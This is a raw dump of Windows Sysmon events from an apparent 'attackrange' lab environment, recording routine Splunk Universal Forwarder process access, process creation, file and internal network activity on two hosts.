10341000x800000000000000082671Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.810{2FDD8D40-B3EE-615A-7601-00000000FD01}23283148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082670Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3EE-615A-7601-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082669Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082668Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082667Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082666Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082665Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082664Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082663Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082662Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082661Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082660Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B3EE-615A-7601-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082659Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3EE-615A-7601-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082658Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.654{2FDD8D40-B3EE-615A-7601-00000000FD01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082657Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.185{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CE9CB7EE52BC56A52D85DC06268A38,SHA256=E40EB695E10E34390C91F0E408530F3CADFF171DA97BCEA3E2BE2E28C81F5149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082656Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:34.185{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A98662EED9B8832773BB9130085A0AEA,SHA256=297889B5676B75CEFB123E5C01A6D747E207750ED64DBA7970B81F44A5611ABC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104779Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:32.478{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51725-false10.0.1.12-8000- 23542300x8000000000000000104781Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:35.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=202A22084A3DDA9EACCBF3292E3D7AA9,SHA256=E9217956CE8B9B5B27018A5EB04ACFB9EF63978CA4976D3403DE2B23276B2B26,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082688Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.739{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50110-false10.0.1.12-8000- 10341000x800000000000000082687Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.794{2FDD8D40-B3EF-615A-7701-00000000FD01}2368932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082686Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.654{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A061FB491DCEC75013533E1AC1CA76B7,SHA256=4C321228295FB548BD7F5F5CD905C69217C7B95BAED7A40DF000729DACBF1391,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082685Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3EF-615A-7701-00000000FD01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082684Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082683Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082682Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082681Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082680Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082679Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082678Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082677Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 